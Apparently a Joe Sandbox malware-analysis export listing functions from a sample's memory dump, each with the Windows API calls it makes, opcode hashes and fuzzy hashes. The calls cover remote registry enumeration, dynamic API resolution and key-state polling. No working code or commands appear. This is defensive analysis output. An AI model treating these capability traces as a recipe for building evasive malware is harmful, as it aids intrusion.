                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                          • String ID:
                                                                          • API String ID: 2364364464-0
                                                                          • Opcode ID: d0fdc79f59fc36636a4cafcdb0d569fed8fb0c68173db530d0147dc4b1030866
                                                                          • Instruction ID: d72d5934c4334a8328e03ce231f1083b45440e16ff00380cb3708afdbd9a4deb
                                                                          • Opcode Fuzzy Hash: d0fdc79f59fc36636a4cafcdb0d569fed8fb0c68173db530d0147dc4b1030866
                                                                          • Instruction Fuzzy Hash: BF8191716043009FD726EF28C896F6AB7E5AF48710F04881EF999DB292D770AC45CB81
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 00390E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0038FDAD,?,?), ref: 00390E31
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003900FD
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0039013C
                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00390183
                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 003901AF
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003901BC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                          • String ID:
                                                                          • API String ID: 3440857362-0
                                                                          • Opcode ID: e76c1101f03e69d912ee7a18e89a5fe2653494ea8c86a9e1d2bb6d8f66b7a7c7
                                                                          • Instruction ID: 8044ca5e3b92e7f9e071830e3fee5117c4ce24a6fd11bf4026985562fcf72e6a
                                                                          • Opcode Fuzzy Hash: e76c1101f03e69d912ee7a18e89a5fe2653494ea8c86a9e1d2bb6d8f66b7a7c7
                                                                          • Instruction Fuzzy Hash: E0514E71208205AFDB1AEF58C881FABB7E9FF88314F44491DF5968B291DB31E944CB52
                                                                          APIs
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0038D927
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0038D9AA
                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0038D9C6
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0038DA07
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0038DA21
                                                                            • Part of subcall function 00315A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00377896,?,?,00000000), ref: 00315A2C
                                                                            • Part of subcall function 00315A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00377896,?,?,00000000,?,?), ref: 00315A50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 327935632-0
                                                                          • Opcode ID: 3f62ac3bba3251339e962c99713c5413de5bc9d291555c1f71a4b315fc1ad7c9
                                                                          • Instruction ID: 58cc5a63dbe4dd9c57374385dbe3f436774f1553c50b8bf989a5d04df71ead29
                                                                          • Opcode Fuzzy Hash: 3f62ac3bba3251339e962c99713c5413de5bc9d291555c1f71a4b315fc1ad7c9
                                                                          • Instruction Fuzzy Hash: F4513935A04205DFCB06EFA8C4849ADB7B8FF4D310B1580A6E859AB352D731ED85CF91
                                                                          APIs
                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0037E61F
                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0037E648
                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0037E687
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0037E6AC
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0037E6B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 1389676194-0
                                                                          • Opcode ID: ee306bd90225c4ddc35f4f5cbb7248404ca758d03904e3872a24d3a4fd3b7a6f
                                                                          • Instruction ID: a1a9572e805b501b88491cac2a5d45d986f2acefcadf39d070249b760c3a4b6d
                                                                          • Opcode Fuzzy Hash: ee306bd90225c4ddc35f4f5cbb7248404ca758d03904e3872a24d3a4fd3b7a6f
                                                                          • Instruction Fuzzy Hash: 26510635A00205DFCB06EF64C991AAEBBF5EF0D314F1480A9E849AB362CB31ED51CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bf94da36eab5c0fabeb3ecca5907d4c172fdd1e1d0c97a130df4d3adbe302781
                                                                          • Instruction ID: ab8ff788495d6f0c00bbdc945a1574268872404f1d9715317580fb22b0bcdce6
                                                                          • Opcode Fuzzy Hash: bf94da36eab5c0fabeb3ecca5907d4c172fdd1e1d0c97a130df4d3adbe302781
                                                                          • Instruction Fuzzy Hash: DF41D935905914AFDF12DF28DC48FA9BBA8EB09310F160366F816E72E1C7309D41DAD1
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 00312357
                                                                          • ScreenToClient.USER32(003D57B0,?), ref: 00312374
                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00312399
                                                                          • GetAsyncKeyState.USER32(00000002), ref: 003123A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                          • String ID:
                                                                          • API String ID: 4210589936-0
                                                                          • Opcode ID: 79c6036e831c54639991da22e2c5bc9e869268c863b1e1af2266e5be04eab656
                                                                          • Instruction ID: 654fec87e83cc74661ee138b216fe7db42383c8ec6767d63b67be1c48d7142e0
                                                                          • Opcode Fuzzy Hash: 79c6036e831c54639991da22e2c5bc9e869268c863b1e1af2266e5be04eab656
                                                                          • Instruction Fuzzy Hash: 02416335504105FFCF1A9F69C844AEEBBB4FB09360F114316F83996190C735A9A4DB91
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003663E7
                                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00366433
                                                                          • TranslateMessage.USER32(?), ref: 0036645C
                                                                          • DispatchMessageW.USER32(?), ref: 00366466
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00366475
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                          • String ID:
                                                                          • API String ID: 2108273632-0
                                                                          • Opcode ID: 0ca917a4b6ede8d03e5df1e45d4ca83115cd79eddcad6b9b261d98a699849804
                                                                          • Instruction ID: cce45f0167d44984d5d92a96da34f869fadb7b294bf990b237a41e822da1dc61
                                                                          • Opcode Fuzzy Hash: 0ca917a4b6ede8d03e5df1e45d4ca83115cd79eddcad6b9b261d98a699849804
                                                                          • Instruction Fuzzy Hash: A731D631A01646AFDB27CF72DC46BF67BBCAB01380F25816AE421C31A5EB359489D760
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00368A30
                                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00368ADA
                                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00368AE2
                                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00368AF0
                                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00368AF8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostSleep$RectWindow
                                                                          • String ID:
                                                                          • API String ID: 3382505437-0
                                                                          • Opcode ID: 1dbb7d2f5832c5deed31e62f2ea361ead5fef5137ae9370932cea657e6033a65
                                                                          • Instruction ID: 6d255ba1bd332c901ca9db6e170a99ef175bf3341c9066d093858cd21cccd280
                                                                          • Opcode Fuzzy Hash: 1dbb7d2f5832c5deed31e62f2ea361ead5fef5137ae9370932cea657e6033a65
                                                                          • Instruction Fuzzy Hash: 6031CE71500219EFDF15CFA8D94CA9E7BB9EB08315F10822AF925EB2D4C7B09D54DB90
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 0036B204
                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0036B221
                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0036B259
                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0036B27F
                                                                          • _wcsstr.LIBCMT ref: 0036B289
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                          • String ID:
                                                                          • API String ID: 3902887630-0
                                                                          • Opcode ID: 252b38b971751b39a8d1ba635d56c3997386c776c1bbda2653c3c5fdb3f0a379
                                                                          • Instruction ID: 5dac2fce8fa728a9ed3c73b7bd5f96444c884ef5c470eafbccaec2d07b0a72bf
                                                                          • Opcode Fuzzy Hash: 252b38b971751b39a8d1ba635d56c3997386c776c1bbda2653c3c5fdb3f0a379
                                                                          • Instruction Fuzzy Hash: 6821C571204210BBEB175B799C59E7FBBECDF49750F01813AF805DE165EB61DC809A60
                                                                          APIs
                                                                            • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0039B192
                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0039B1B7
                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0039B1CF
                                                                          • GetSystemMetrics.USER32(00000004), ref: 0039B1F8
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00380E90,00000000), ref: 0039B216
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$MetricsSystem
                                                                          • String ID:
                                                                          • API String ID: 2294984445-0
                                                                          • Opcode ID: df2551875b8913cc4db2fb33fb0fc6b307fa7cdc0ee309afd7d469efc6ef7d0a
                                                                          • Instruction ID: 65362ea01b5d976bbd6038c420f79f6a82b7e00ceb75d272ff2e6a9a2b298249
                                                                          • Opcode Fuzzy Hash: df2551875b8913cc4db2fb33fb0fc6b307fa7cdc0ee309afd7d469efc6ef7d0a
                                                                          • Instruction Fuzzy Hash: CA21A371A10255AFCF169F38ED44A6AB7A8FB05361F124B39F972D71E0D7309820DB90
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00369320
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00369352
                                                                          • __itow.LIBCMT ref: 0036936A
                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00369392
                                                                          • __itow.LIBCMT ref: 003693A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$__itow$_memmove
                                                                          • String ID:
                                                                          • API String ID: 2983881199-0
                                                                          • Opcode ID: 50833497e80fa7fa8d9ac5a4028965f3d8bcdc5248010c31d7fb7bbeaef51517
                                                                          • Instruction ID: 2e536c5de38b8138d78da269538bd0708467cdd3513b95550c2dd41c967f5ed1
                                                                          • Opcode Fuzzy Hash: 50833497e80fa7fa8d9ac5a4028965f3d8bcdc5248010c31d7fb7bbeaef51517
                                                                          • Instruction Fuzzy Hash: D1210435700208BBDB12AB618C89FEE3BACEB49710F148026FD05DB2C0D6B0CD558791
                                                                          APIs
                                                                          • IsWindow.USER32(00000000), ref: 00385A6E
                                                                          • GetForegroundWindow.USER32 ref: 00385A85
                                                                          • GetDC.USER32(00000000), ref: 00385AC1
                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00385ACD
                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00385B08
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ForegroundPixelRelease
                                                                          • String ID:
                                                                          • API String ID: 4156661090-0
                                                                          • Opcode ID: 975251ebbbe3ca28b06fd3736aed854355550240fff166b909ac8012d982796a
                                                                          • Instruction ID: 3940983e57430fadb58425ffebe55c45ff63dd262b6e12dd4a3cbd4aaf620774
                                                                          • Opcode Fuzzy Hash: 975251ebbbe3ca28b06fd3736aed854355550240fff166b909ac8012d982796a
                                                                          • Instruction Fuzzy Hash: B9216235A00204AFD715EF65D888A9AB7E9EF4C350F14C479F809D7351CA75AD41CB90
                                                                          APIs
                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0031134D
                                                                          • SelectObject.GDI32(?,00000000), ref: 0031135C
                                                                          • BeginPath.GDI32(?), ref: 00311373
                                                                          • SelectObject.GDI32(?,00000000), ref: 0031139C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                          • String ID:
                                                                          • API String ID: 3225163088-0
                                                                          • Opcode ID: 126393ee1706014aff1e47ace65970f0dcec6ddd11328c73879ccc09051aa587
                                                                          • Instruction ID: d06aa5c1564c63f2cd4a316d50bb9062542d3137b05969c2225fa53a29c92892
                                                                          • Opcode Fuzzy Hash: 126393ee1706014aff1e47ace65970f0dcec6ddd11328c73879ccc09051aa587
                                                                          • Instruction Fuzzy Hash: 7D215930A02618EFDB179F25EC047E97BACEB04322F154627E9209A5B4D3719891EF90
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID:
                                                                          • API String ID: 2931989736-0
                                                                          • Opcode ID: 319e9c9d51066d03b677ad501bc8eb51e7a7864197fe5114ddaa2f7f1067154f
                                                                          • Instruction ID: e9cccadbe3d7e0ca518b7dcae8aae6419c2e5ac071b81080b64b57197c2997ea
                                                                          • Opcode Fuzzy Hash: 319e9c9d51066d03b677ad501bc8eb51e7a7864197fe5114ddaa2f7f1067154f
                                                                          • Instruction Fuzzy Hash: E801B5726401157BD2076B1A6D82FFBF36CDE52798F048021FE05DA24AEB61DF508AA4
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00374ABA
                                                                          • __beginthreadex.LIBCMT ref: 00374AD8
                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00374AED
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00374B03
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00374B0A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                          • String ID:
                                                                          • API String ID: 3824534824-0
                                                                          • Opcode ID: dc71ec2eac64188ceb38dc7af984b677dbf60f925d50f50328b5424feec618e4
                                                                          • Instruction ID: 926c53c9c02898a77806920f9dd94480ba2970d418df0c0081265b7d57e92fa0
                                                                          • Opcode Fuzzy Hash: dc71ec2eac64188ceb38dc7af984b677dbf60f925d50f50328b5424feec618e4
                                                                          • Instruction Fuzzy Hash: 3E110876905214BFC7139FA8AC04A9B7FACEB45321F15826AF818D3250D775DD0487E0
                                                                          APIs
                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0036821E
                                                                          • GetLastError.KERNEL32(?,00367CE2,?,?,?), ref: 00368228
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00367CE2,?,?,?), ref: 00368237
                                                                          • HeapAlloc.KERNEL32(00000000,?,00367CE2,?,?,?), ref: 0036823E
                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00368255
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 842720411-0
                                                                          • Opcode ID: 77670e0cc1b74f2de1aedbc73e7a92ba5962bae0c930dd5c9be74f48f722f09a
                                                                          • Instruction ID: 0b690e104c362f1f6512ef1e4bab348f9f218bd49d114bfe255e2c9c4b101c2b
                                                                          • Opcode Fuzzy Hash: 77670e0cc1b74f2de1aedbc73e7a92ba5962bae0c930dd5c9be74f48f722f09a
                                                                          • Instruction Fuzzy Hash: 030181B1205604FFDB224FA5DC48D6B7FACEF8E755B50492AF809C3220DB328C50CA60
                                                                          APIs
                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?,?,?,00367455), ref: 00367127
                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?,?), ref: 00367142
                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?,?), ref: 00367150
